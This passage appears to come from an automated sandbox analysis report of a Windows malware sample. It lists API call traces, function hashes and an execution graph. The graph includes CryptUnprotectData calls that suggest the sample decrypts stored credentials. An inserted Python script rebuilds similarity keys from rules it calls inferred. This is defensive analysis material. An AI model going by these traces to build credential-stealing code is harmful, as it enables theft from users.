                                                                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,774D3420,00403512), ref: 00405945
                                                                                                            • lstrcatW.KERNEL32(?,00409014), ref: 00405957
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405935
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                            • API String ID: 2659869361-2145255484
                                                                                                            • Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                                                                            • Instruction ID: 6247f5a3c9563be90945cd41d23768fa590745b080056b24a315d5606c671452
                                                                                                            • Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                                                                            • Instruction Fuzzy Hash: E5D05E21101921AAC21277448C04DDF669CEE45300384002AF200B20A2CB7C1D518BFD
                                                                                                            APIs
                                                                                                            • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                                                                            • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                                                                            • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                                                                              • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 1404258612-0
                                                                                                            • Opcode ID: 0759821644e88925b44a7e9fb1563554894f113fe06b33f49c2a0c28299a5465
                                                                                                            • Instruction ID: 0d64a3d5d22a86ce83a9b45ae5cd800923300da454a86426803db7941f711343
                                                                                                            • Opcode Fuzzy Hash: 0759821644e88925b44a7e9fb1563554894f113fe06b33f49c2a0c28299a5465
                                                                                                            • Instruction Fuzzy Hash: 76113675A00208AFDB00DFA5C945DAEBBB9EF04344F20407AF905F62A1D7349E50CB68
                                                                                                            APIs
                                                                                                            • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,774D2EE0,004037F6,774D3420,00403621,?), ref: 00403839
                                                                                                            • GlobalFree.KERNEL32(?), ref: 00403840
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403831
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Free$GlobalLibrary
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                            • API String ID: 1100898210-2145255484
                                                                                                            • Opcode ID: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
                                                                                                            • Instruction ID: bf490ea997193b46d556285b385326fb3516ec302950e4cd11f154ac4515a356
                                                                                                            • Opcode Fuzzy Hash: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
                                                                                                            • Instruction Fuzzy Hash: F9E0C23394102057C7216F15ED04B1ABBE86F89B22F018476F9407B7A283746C528BED
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\4NG0guPiKA.exe,C:\Users\user\Desktop\4NG0guPiKA.exe,80000000,00000003), ref: 00405987
                                                                                                            • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\4NG0guPiKA.exe,C:\Users\user\Desktop\4NG0guPiKA.exe,80000000,00000003), ref: 00405997
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharPrevlstrlen
                                                                                                            • String ID: C:\Users\user\Desktop
                                                                                                            • API String ID: 2709904686-3080008178
                                                                                                            • Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                                                                            • Instruction ID: e5431d3d33a146c3150d202dfaa2e9e12a1dec100281116c20088c3141bfb115
                                                                                                            • Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                                                                            • Instruction Fuzzy Hash: C6D05EA2414920DED3226704DC44AAFA3ACEF113107894466F901E61A5D7785C808AFD
                                                                                                            APIs
                                                                                                              • Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,00000001), ref: 10001260
                                                                                                              • Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                                            • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1575114385.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1575078403.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                             • Associated: 00000000.00000002.1575136466.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                                                             • Associated: 00000000.00000002.1575158059.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_10000000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$Free$Alloclstrcpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 852173138-0
                                                                                                            • Opcode ID: a36c3baa5ea934aaf830980c9406ed3c53712f48e27dcab7b4d6d185e039dd99
                                                                                                            • Instruction ID: c8ae98bcc35e74d2b72c58860f7bdf59a74f39180ec1ffd54fa0f92d9f30571b
                                                                                                            • Opcode Fuzzy Hash: a36c3baa5ea934aaf830980c9406ed3c53712f48e27dcab7b4d6d185e039dd99
                                                                                                            • Instruction Fuzzy Hash: 5E3190F6904211AFF314CF64DC859EA77E8EB853D0B124529FB41E726CEB34E8018765
                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405ACB
                                                                                                            • lstrcmpiA.KERNEL32(00405CF5,00000000), ref: 00405AE3
                                                                                                            • CharNextA.USER32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AF4
                                                                                                            • lstrlenA.KERNEL32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                                            • String ID:
                                                                                                            • API String ID: 190613189-0
                                                                                                            • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                            • Instruction ID: dad0a046b028959ebe33103b56e1cab2fddac0818810981e259aca52f0e6fc56
                                                                                                            • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                            • Instruction Fuzzy Hash: 59F06232608558BFC712DFA5DD40D9FBBA8DF06260B2540B6F801F7251D674FE019BA9
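The "API ID" under each function's Similarity entry is the key that lets a function be matched against functions in other samples: it is built from the function's API call list, subcalls included, rather than from the code bytes. The Python below is an added example, not Joe Sandbox's own code, that rebuilds that key from an "APIs" block as printed in this report. The derivation rules it uses (split each API name on CamelCase, drop tokens shorter than four characters such as Get, Reg, Key, Ex and the A/W suffix, group the remaining tokens by how often they occur across the calls in descending order with "$" between groups, and concatenate each group in ASCII order) are inferred from the keys shown on this page and are an assumption; the numeric "API String ID" hash is not reproduced. The sample block is the GetFileVersionInfo function's APIs section from this report.

```python
"""Rebuild a Joe Sandbox-style "API ID" similarity key from a function's "APIs"
block.  The tokenisation and grouping rules are inferred from the keys printed
in this report, not taken from Joe Sandbox (assumption)."""
import re
from collections import Counter

# Sample input copied from the report: the APIs block of the function at
# 00401F17 (the "Memory Dump Source" line is the start of the next section).
SAMPLE_APIS_BLOCK = """\
APIs
• GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
• GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
• GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
• VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
  • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
Memory Dump Source
"""

# "<api>.<module>" at the start of a bullet, optionally behind the subcall note.
_CALL_RE = re.compile(r"•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?(\w+)\.(\w+)")
# CamelCase split: "GetFileVersionInfoSizeW" -> Get File Version Info Size W,
# "lstrlenW" -> lstrlen W.
_TOKEN_RE = re.compile(r"[A-Z][a-z0-9]*|[a-z0-9]+")
MIN_TOKEN_LEN = 4  # assumption: Get/Reg/Key/Ex and the A/W suffix never show up in keys


def parse_api_calls(block):
    """Return (api, module) pairs listed under the "APIs" header, subcalls included."""
    calls, in_apis = [], False
    for raw in block.splitlines():
        line = raw.strip()
        if line == "APIs":
            in_apis = True
            continue
        if in_apis and not line.startswith("•"):
            break  # next section (Strings, Memory Dump Source, ...)
        if in_apis:
            m = _CALL_RE.match(line)
            if m:
                calls.append((m.group(1), m.group(2)))
    return calls


def camel_tokens(api_name):
    """Split an API name into CamelCase tokens and drop the short ones."""
    return [t for t in _TOKEN_RE.findall(api_name) if len(t) >= MIN_TOKEN_LEN]


def api_id(api_names):
    """Group tokens by occurrence count (descending, "$"-separated); each group
    is concatenated in ASCII order, so uppercase tokens sort before lowercase."""
    counts = Counter(t for name in api_names for t in camel_tokens(name))
    by_count = {}
    for tok, n in counts.items():
        by_count.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(by_count[n])) for n in sorted(by_count, reverse=True))


def api_id_from_block(block):
    return api_id(name for name, _module in parse_api_calls(block))


if __name__ == "__main__":
    # Compare with the API ID printed in the report for this function.
    print(api_id_from_block(SAMPLE_APIS_BLOCK))
```

Running it on the sample block yields the key the report prints for that function, and the same function applied to the other call lists on this page (for example lstrlenW, CharPrevW, lstrcatW) reproduces their keys too, which is a quick way to confirm the inferred rules before relying on them for matching functions across your own samples.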

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:11.7%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:2%
                                                                                                            Total number of Nodes:307
                                                                                                            Total number of Limit Nodes:17
                                                                                                             execution_graph: rendered call graph (the node/edge dump behind it is truncated and not reproduced as text). The nodes span code at db168-db1b1, 331e0188-331ed9e0, 35f29544-35f2fb92 and 364500b0-3645dbb0 and reach the following API calls: SetTimer (36452020), GetCurrentThreadId (36452461, 36450ab3), CreateWindowExW (36450104, 36450110, 36450178), CryptUnprotectData (331ec638, 331ed540, 331ed550, 331ed1ec, 331ed9e0), GetCurrentProcess (36450980, 364509c6, 36450a55), GetCurrentThread (36450a18), DuplicateHandle (36450bc8), WaitMessage (3645dbb0), DispatchMessageW (3645c6c4). Several nodes are collapsed as "N API calls" (36450938: 10, 3645193c: 16, 36452b7c: 11, 35f2962c and 35f29544: 2).
43625->43620 43625->43622 43625->43623 43625->43624 43628 364543f8 43626->43628 43627 36450938 10 API calls 43629 36454433 43627->43629 43628->43627 43630 3645443e 43629->43630 43638 364535a8 43629->43638 43630->43603 43636 36454405 43632->43636 43633 36450938 10 API calls 43634 36454433 43633->43634 43635 3645443e 43634->43635 43637 364535a8 12 API calls 43634->43637 43635->43603 43636->43633 43637->43635 43639 364535b3 43638->43639 43640 364544b0 43639->43640 43642 364535dc 43639->43642 43643 364535e7 43642->43643 43650 364535ec 43643->43650 43645 3645451f 43654 364593b4 43645->43654 43659 36459420 43645->43659 43665 36459412 43645->43665 43646 36454559 43646->43640 43653 364535f7 43650->43653 43651 364556c0 43651->43645 43652 36454248 12 API calls 43652->43651 43653->43651 43653->43652 43655 364593bf 43654->43655 43656 3645945d 43655->43656 43657 35f2fab8 2 API calls 43655->43657 43658 35f2faa8 2 API calls 43655->43658 43656->43646 43657->43656 43658->43656 43661 36459451 43659->43661 43662 36459551 43659->43662 43660 3645945d 43660->43646 43661->43660 43663 35f2fab8 2 API calls 43661->43663 43664 35f2faa8 2 API calls 43661->43664 43662->43646 43663->43662 43664->43662 43666 364593bf 43665->43666 43666->43665 43667 3645945d 43666->43667 43668 35f2fab8 2 API calls 43666->43668 43669 35f2faa8 2 API calls 43666->43669 43667->43646 43668->43667 43669->43667 43671 3645c607 43670->43671 43672 3645d49b 43671->43672 43674 3645c618 43671->43674 43672->43611 43675 3645d4d0 OleInitialize 43674->43675 43676 3645d534 43675->43676 43676->43672 43678 3645e7e8 DispatchMessageW 43677->43678 43679 3645e854 43678->43679 43679->43614 43680 ad030 43681 ad048 43680->43681 43682 ad0a2 43681->43682 43688 36451bc1 43681->43688 43699 364502b8 43681->43699 43704 364502c8 43681->43704 43709 36451bd0 43681->43709 43720 364503f0 43681->43720 43690 36451bd0 43688->43690 43689 36451c31 43693 36451c2f 43689->43693 43757 36451854 43689->43757 43690->43689 43692 36451c21 43690->43692 43692->43693 
43723 36451d58 43692->43723 43732 36451d48 43692->43732 43741 36459e44 43692->43741 43747 36459d68 43692->43747 43752 36459d78 43692->43752 43700 364502ee 43699->43700 43702 36451bc1 4 API calls 43700->43702 43703 36451bd0 4 API calls 43700->43703 43701 3645030f 43701->43682 43702->43701 43703->43701 43705 364502ee 43704->43705 43707 36451bc1 4 API calls 43705->43707 43708 36451bd0 4 API calls 43705->43708 43706 3645030f 43706->43682 43707->43706 43708->43706 43712 36451bfd 43709->43712 43710 36451c31 43711 36451854 CallWindowProcW 43710->43711 43714 36451c2f 43710->43714 43711->43714 43712->43710 43713 36451c21 43712->43713 43713->43714 43715 36459e44 3 API calls 43713->43715 43716 36451d48 2 API calls 43713->43716 43717 36451d58 2 API calls 43713->43717 43718 36459d68 3 API calls 43713->43718 43719 36459d78 3 API calls 43713->43719 43715->43714 43716->43714 43717->43714 43718->43714 43719->43714 43721 36450407 43720->43721 43782 36450840 43720->43782 43721->43682 43724 36451d66 43723->43724 43725 36451d93 43723->43725 43726 36451d6e 43724->43726 43729 36451854 CallWindowProcW 43724->43729 43725->43724 43727 36451d98 43725->43727 43726->43693 43728 36451874 GetCurrentThreadId 43727->43728 43730 36451da4 43728->43730 43731 36451dac 43729->43731 43730->43693 43731->43693 43733 36451d58 43732->43733 43734 36451d66 43733->43734 43735 36451d98 43733->43735 43737 36451854 CallWindowProcW 43734->43737 43740 36451d6e 43734->43740 43736 36451874 GetCurrentThreadId 43735->43736 43738 36451da4 43736->43738 43739 36451dac 43737->43739 43738->43693 43739->43693 43740->43693 43742 36459e52 43741->43742 43743 36459e02 43741->43743 43761 36459e21 43743->43761 43766 36459e30 43743->43766 43744 36459e18 43744->43693 43748 36459d8c 43747->43748 43750 36459e21 3 API calls 43748->43750 43751 36459e30 3 API calls 43748->43751 43749 36459e18 43749->43693 43750->43749 43751->43749 43754 36459d8c 43752->43754 43753 36459e18 43753->43693 43755 36459e21 3 API calls 43754->43755 43756 
36459e30 3 API calls 43754->43756 43755->43753 43756->43753 43758 3645185f 43757->43758 43759 36451e5a CallWindowProcW 43758->43759 43760 36451e09 43758->43760 43759->43760 43760->43693 43762 36459e41 43761->43762 43771 3645a3d8 43761->43771 43775 3645aff0 43761->43775 43778 3645a3e8 43761->43778 43762->43744 43767 3645a3d8 2 API calls 43766->43767 43768 3645a3e8 2 API calls 43766->43768 43769 36459e41 43766->43769 43770 3645aff0 CallWindowProcW 43766->43770 43767->43769 43768->43769 43769->43744 43770->43769 43772 3645a434 43771->43772 43773 364593b4 2 API calls 43772->43773 43774 3645a47d 43772->43774 43773->43774 43774->43762 43776 36451854 CallWindowProcW 43775->43776 43777 3645b00a 43776->43777 43777->43762 43779 3645a434 43778->43779 43780 364593b4 2 API calls 43779->43780 43781 3645a47d 43779->43781 43780->43781 43781->43762 43783 36450856 43782->43783 43785 36450938 10 API calls 43782->43785 43786 36450928 43782->43786 43783->43721 43785->43783 43787 36450948 43786->43787 43788 36450965 43787->43788 43789 36450971 6 API calls 43787->43789 43790 36450980 6 API calls 43787->43790 43788->43783 43789->43788 43790->43788

Control-flow Graph

• Executed
• Not Executed
control_flow_graph: [rendered graph not available in text form; function starting at d66b8, with calls to d6500, d6c98 and d53a8]
Strings
Memory Dump Source
• Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
Similarity
• API ID:
• String ID: (oq$(oq$(oq$(oq$(oq$(oq$,q$,q
• API String ID: 0-2212926057
• Opcode ID: b59c8e4cd2ae55a22169a0e1f39c94d2a257316dec1efa9b2a8f7c29620bda31
• Instruction ID: 2b7ee6c5e037520608795b4cd92795e9d9652023b35f5f647925cd6c9575bb8d
• Opcode Fuzzy Hash: b59c8e4cd2ae55a22169a0e1f39c94d2a257316dec1efa9b2a8f7c29620bda31
• Instruction Fuzzy Hash: 41125A30A003489FCB54DF68D994AAEBBF2AF49314F15865AE845DB361DB32ED41CB60

Control-flow Graph

• Executed
• Not Executed
control_flow_graph: [rendered graph not available in text form; function starting at d5f90, with calls to d5f90, d60e0, d9048, d8d90 and d66b8]
Strings
Memory Dump Source
• Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
Similarity
• API ID:
• String ID: (oq$(oq$(oq$,q$,q$\K$3hK$3K$3$N$3$O$3xO$3
• API String ID: 0-1102877618
• Opcode ID: 2a235322f7b7abc3f276047a026ae7a88ea7a19100998b5c3891b2d3d2634b8b
• Instruction ID: 02f25ad6c7af47a631c66802eb3ec1de3da70ba6e673dcff882308c1f2c5e67b
• Opcode Fuzzy Hash: 2a235322f7b7abc3f276047a026ae7a88ea7a19100998b5c3891b2d3d2634b8b
• Instruction Fuzzy Hash: B6122D30A00219DFDB54CFA9C954AAEBBF2FF89314F15806AE405AB361DB36DD41CB60

Control-flow Graph

• Executed
• Not Executed
control_flow_graph: [rendered graph not available in text form; function starting at 3645d6e8, with calls to 3645c678, 3645c684, 3645c690, 3645c69c, 3645c6a8, 3645c6b8, 3645c6c4, 3645c6d0 and 36450938, and one call to the API WaitMessage]
Strings
Memory Dump Source
• Source File: 00000003.00000002.2650189669.0000000036450000.00000040.00000800.00020000.00000000.sdmp, Offset: 36450000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_36450000_4NG0guPiKA.jbxd
Similarity
• API ID: DispatchMessage
• String ID: $zZ6$$zZ6$$zZ6$$zZ6
• API String ID: 2061451462-1758902879
• Opcode ID: d907b28e371f49c162440c1cab69c2ec122265d43b8ef03d22574f03dca59df5
• Instruction ID: 16ec74deb8b9e93b241c23c98f6a92ca5b8b2abb82ddca978f43229bf9c38c28
• Opcode Fuzzy Hash: d907b28e371f49c162440c1cab69c2ec122265d43b8ef03d22574f03dca59df5
• Instruction Fuzzy Hash: 12F14674E00309CFEB05DFA9C844B9DBBF2BF88304F168168E505AB265DBB4E945CB85

Control-flow Graph

• Executed
• Not Executed
control_flow_graph: [rendered graph not available in text form; function starting at d19b8, with calls to d02a8]
Strings
Memory Dump Source
• Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
Similarity
• API ID:
• String ID: Xq$Xq$Xq$Xq$Xq$Xq
• API String ID: 0-905847027
• Opcode ID: 753e84714d054c2d14a54e3ff5b5eed4b87b352dc436216fa5a0a53021e9c6c4
• Instruction ID: e8c45b37dd5097ade50a5227fad7dd37f7628338f1f9e00e64a7e9620cfaa463
• Opcode Fuzzy Hash: 753e84714d054c2d14a54e3ff5b5eed4b87b352dc436216fa5a0a53021e9c6c4
• Instruction Fuzzy Hash: 3042B1BAE6D7E54BD712CB306878295BFF0AB62204B1E4DDED0C192193D7A0C486C767
Strings
Memory Dump Source
• Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
Similarity
• API ID:
• String ID: (oq$4'q
• API String ID: 0-1336004174
• Opcode ID: c291fb15cd5347f60a4e66cf140df22063cca37f199ea354bf7ccab1ec995f03
• Instruction ID: 75ec393ee28c43dd6d00f5c116ad2adcbbf698864e2527d2f22814e52526b240
• Opcode Fuzzy Hash: c291fb15cd5347f60a4e66cf140df22063cca37f199ea354bf7ccab1ec995f03
• Instruction Fuzzy Hash: 95825C71A04209DFCB15CFA8C984AAEBBF2FF88310F15855AE4059B3A5D731ED41CBA5

Control-flow Graph

• Executed
• Not Executed
control_flow_graph: [rendered graph not available in text form; function starting at 3645e8a8, with calls to d324d, d3168 and 35f2cc28]
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2650189669.0000000036450000.00000040.00000800.00020000.00000000.sdmp, Offset: 36450000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_36450000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Teq$pGq
                                                                                                            • API String ID: 0-4004436683
                                                                                                            • Opcode ID: cd873173861a8366ddc13d99e8699ce02a5148724bc728b22edba89776f9c61e
                                                                                                            • Instruction ID: faa99f13db7a49b945e06a938bf8b09dc31cdb677f7964ccf41bc74c1aa33356
                                                                                                            • Opcode Fuzzy Hash: cd873173861a8366ddc13d99e8699ce02a5148724bc728b22edba89776f9c61e
                                                                                                            • Instruction Fuzzy Hash: BE829374A00228DFDB25DF65C894BA9BBB2FB89300F1081E9D90A77355DB719E82CF54

                                                                                                            Control-flow Graph

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
